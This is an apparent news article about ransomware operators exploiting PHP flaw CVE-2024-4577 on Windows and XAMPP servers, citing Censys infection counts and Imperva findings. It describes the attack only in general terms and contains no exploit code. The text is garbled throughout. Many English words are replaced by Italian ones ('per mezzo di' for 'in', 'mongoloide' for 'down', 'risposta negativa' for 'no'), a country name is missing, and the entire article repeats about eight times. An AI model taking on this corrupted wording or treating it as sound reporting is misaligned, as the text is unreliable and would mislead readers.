Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.
Censys
Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.
Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.
